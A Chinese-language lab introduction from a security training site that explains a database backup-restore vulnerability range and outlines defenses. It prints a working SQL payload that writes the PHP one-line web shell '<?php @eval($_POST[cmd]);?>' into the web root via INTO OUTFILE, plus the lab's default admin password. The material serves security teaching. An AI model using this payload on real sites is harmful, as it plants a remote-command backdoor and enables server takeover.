靶场科普 | 数据库备份恢复漏洞靶场

发表时间:2022-03-21 18:00

本文由“东塔网络安全学院”总结归纳


靶场介绍

数据库备份恢复漏洞靶场


今天,给大家介绍一下“东塔攻防世界”其中的一个靶场:“数据库备份恢复漏洞靶场”。

一、实验介绍

通过对数据库可以下载备份文件到本地,再给该文件添加sql代码上传来实现注入

如:

drop table if exists emlog_shell;// 如果存在emlog_shell表就把它删了;

create table emlog_shell( `cmd` longtext not null);// 重新创建一张表emlog_shell,而且只有字段cmd;

insert into emlog_shell values ( "<?php @eval($_POST[cmd]);?>");// longtext类型且不为空,并且插入字段值,构成一句话木马;

select cmd from emlog_shell into outfile ' /var/www/html/11112.php ';// 然后将cmd的值读出来outfle文件输出流输出到/var/www/html/a.php

drop table if exists emlog_shell;// emlog_shell表删了


注意事项,后台登录地址为:URL中直接后面加入 /admin 进入后台

后台登录账号和密码root ,123456


二、实验目的

1、了解验证码绕过的相关知识
2、了解后台地址扫描及其他相关漏洞资料
3、了解后台常用账户密码的利用方式


三、实验步骤

根据解题思路完成数据库备份漏洞的利用


四、防御方法

1. 禁止下载备份文件

2. 对上传的sql文件严格检测,过滤一些关键字,包括特殊字符等